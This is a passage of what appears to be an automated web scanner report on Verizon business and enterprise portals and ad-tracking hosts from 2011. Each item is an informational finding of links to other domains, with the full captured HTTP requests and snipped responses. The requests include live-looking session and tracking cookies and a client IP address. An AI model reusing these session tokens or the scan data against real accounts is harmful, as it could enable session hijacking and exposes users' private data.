Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=portletInstance_10&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Quick+Links&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 9836
Expires: Mon, 05 Sep 2011 22:35:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:58 GMT
Connection: close
Vary: Accept-Encoding

<div class="&#xFF3F;bea-wlp-disc-context-hook" id="7468656d655f745f31343334303134"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="&#xFF3F;bea-wlp-disc-context-hook
...[SNIP]...
<li><a href="https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_zf8_9httNgpmR"
target="_blank" title="Keep up with mobile products for your business." onclick="dcsClick('EV_QuickLinks_Sign_Up_for_Wireless_Email_Updates','Displays Sign Up for Wireless Email Updates');">
Sign Up for Wireless Email Updates</a>
...[SNIP]...
<li><a href="https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_zf8_9httNgpmR"
target="_blank" title="Keep up with mobile products for your business." onclick="dcsClick('EV_QuickLinks_Sign_Up_for_Wireless_Email_Updates','Displays Sign Up for Wireless Email Updates');">
Sign Up for Wireless Email Updates</a>
...[SNIP]...

15.11. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=portletInstance_11&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=How+can+we+help+you%3F&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 6677
Expires: Mon, 05 Sep 2011 22:35:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:59 GMT
Connection: close
Vary: Accept-Encoding

<div class="&#xFF3F;bea-wlp-disc-context-hook" id="7468656d655f745f31343334303136"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="&#xFF3F;bea-wlp-disc-context-hook
...[SNIP]...
<td style="padding-top: 5px; padding-left: 4px; padding-bottom: 4px;" class="AltTblTd_spt">
<a href="http://www.verizonwireless.com/b2c/businessSolutions/contactUs.jsp" target="_blank" onclick="dcsClick('EV_Overview_Help_Wireless_Sales_Icon','Goes to VZ Wireless Business Solutions Page');">
<img src="/SMBPortalWeb/images/icon_callus_sm.gif" />
...[SNIP]...
<td style="padding-top: 15px; padding-left: 3px;" class="AltTblTd_spt">
Contact a <a href="http://www.verizonwireless.com/b2c/businessSolutions/contactUs.jsp"
target="_blank" onclick="dcsClick('EV_Overview_Help_Wireless_Sales_Text','Goes to VZ Wireless Business Solutions Page');">
Wireless Sales Representative</a>
...[SNIP]...

15.12. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:16:11 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...

15.13. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:14:39 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 278
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=CAESEDlps0WDQzL_sGCOCdezGYM&amp;cver=1">here</A>
...[SNIP]...

15.14. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:18:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 322
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1284649%26t%3D2">here</A>
...[SNIP]...

15.15. https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/signIn.do

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Expires: Mon, 05 Sep 2011 22:25:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:37 GMT
Content-Length: 21907
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...
<td valign="top" class="taskColAnon">
               <iframe title="Enroll" allowtransparency="true" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" id="enRollIframe" name="enRollIframe" onload="_resizeIframeToFit(this.id, true)" src='https://EnterprisePortalContent.mci.com/CC/public/Login/en-US/Enroll.htm?pbpath=https://EnterpriseCenter.verizon.com' width="239px" height="212px"> IFRAME supported needed to view contents!</iframe>
...[SNIP]...
<td valign="top" class="taskColAnon">
               <iframe title="Special Buys" allowtransparency="true" scrolling="no" frameborder="0" marginwidth="0" marginheight="0" id="specialBuysIframe" name="specialBuysIframe" src='https://EnterprisePortalContent.mci.com/CC/public/Login/en-US/SpecialBuys.htm' width="239px" height="212px"> IFRAME supported needed to view contents!</iframe>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       <a href="https://EnterprisePortalContent.mci.com/CC/public/AMER/general/default/en-US/termsconditions.html" target="_self" >Terms &amp; Conditions</a>
...[SNIP]...
<br>

   Verizon Wireless:
   
       <a href="https://b2b.verizonwireless.com/b2b/commerce/privacy.go?nav=ext" target="_self" >Privacy</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       <a href="https://b2b.verizonwireless.com/tbmb/legal_notices_nologin.do" target="_self" >Legal Notices</a>&nbsp;&nbsp;|&nbsp;&nbsp;
       <a href="https://b2b.verizonwireless.com/tbmb/terms_and_conditions_nologin.do" target="_self" >Website Terms of Use</a>&nbsp;&nbsp;|&nbsp;&nbsp;
   
   <a href="https://b2b.verizonwireless.com/tbmb/customer_information.do" target="_self" >Customer Information Overview</a>
...[SNIP]...

15.16. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366? HTTP/1.1
Host: fls.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:14:36 GMT
Expires: Mon, 05 Sep 2011 22:14:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 963
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://idcs.interclick.com/Segment.aspx?sid=5d69f842-0719-4c5b-961b-9400c8d4e652"/><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=verizonlb_cs=1&betq=12605=431339" width = "1" height = "1" border = "0"><img src="https://12.xg4ken.com/media/redir.php?track=1&type=nav_home&val=0.0&token=&orderId= dynamic_value&promoCode=SEM&valueCurrency=USD&product=" width="1" height="1"><img src="http://ad.doubleclick.net/activity;src=1379696;dcnet=4155;boom=38640;sz=1x1;ord=1?"width="1" height="1" border="0" alt=""><div style="position:absolute;"><script src="http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_VerizoncomHomepage.js"></script></div><img width="1" height="1" src="http://tap.tapad.com/audience/pxl.png?aud_id=4DSP41"></body>
...[SNIP]...

15.17. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /activityi;src=2761768;type=consu459;cat=fiost917;ord=789927707519.3822? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:18:32 GMT
Expires: Mon, 05 Sep 2011 22:18:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 615
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Segment Tag | A
...[SNIP]...
<div style="position:absolute;"><script src="http://cdn.flashtalking.com/container/vrzmvo/vrzmvo_cont_FIOSTVFeaturesPage.js"></script></div><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=58630&partnerID=51&clientID=1042&key=segment" width="1" height="1" /></body>
...[SNIP]...

15.18. http://forums.verizon.com/vrzn/restapi/vc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.verizon.com
Path:   /vrzn/restapi/vc/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /vrzn/restapi/vc/?restapi.response_template=user_infobox&user_id=11375 HTTP/1.1
Host: forums.verizon.com
Proxy-Connection: keep-alive
Referer: http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; LiSESSIONID=96AD1A580BC805EF6D16752DEF4B5C57; WT_FPC=id=26270d900e95bd3ea5f1315276980084:lv=1315276980084:ss=1315276980084; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:43:14 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 1049
Connection: close
Content-Type: text/html;charset=UTF-8


<div id="litho_user_hoverbox">
   <div class="litho_userInfo_top">
       <div id="litho_user_name">CindyB</div>
       
           <div ><img src="http://vrzn.i.lithium.com/t5/image/serverpage/avatar-name/environment-clouds/avatar-theme/legacyclassic/avatar-collection/environment/avatar-display-size/message" alt="User Icon" /></div>
...[SNIP]...

15.19. http://media.verizon.com/media/scripts/widget.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.verizon.com
Path:   /media/scripts/widget.ashx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /media/scripts/widget.ashx?widget=vzNews&container=vzNewsWidget HTTP/1.1
Host: media.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 143025
Date: Mon, 05 Sep 2011 22:41:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=&J=; domain=verizon.com; expires=Wed, 07-Sep-2011 22:41:23 GMT; path=/media

/* widget.ashx code generated : 9/5/2011 10:41:23 PM; valid until: 9/5/2011 5:42:21 PM */
var vzWidgetsBaseURI = 'http://media.verizon.com/media',
vzWidgetsSignedIn = false;

/* files consolidated
...[SNIP]...
</div>' +
       '    <a href="http://www.adobe.com/go/getflash/" target="_blank" style="text-decoration:none; color:#000; font-weight: bold;"><div>
...[SNIP]...

15.20. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/homepage/139299456@Top1,x13?search= HTTP/1.1
Host: oascentral.verizononline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1001
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Top1') {
document.write ('<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/business2.vz.net/out/homepage/L29/1781583294/Top1/VDSL/house_300x250_smb_intuit/intuit_wireless_smb_300x250.html/4d686437616b356c5473304142582f54" target="_blank"> \n');
document.write ('<img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/house_300x250_smb_intuit/adbanner_intuit_300x250.gif/1299008084" border="0" \n');
document.write ('width="300" height="250" alt=""/>
</a>
...[SNIP]...
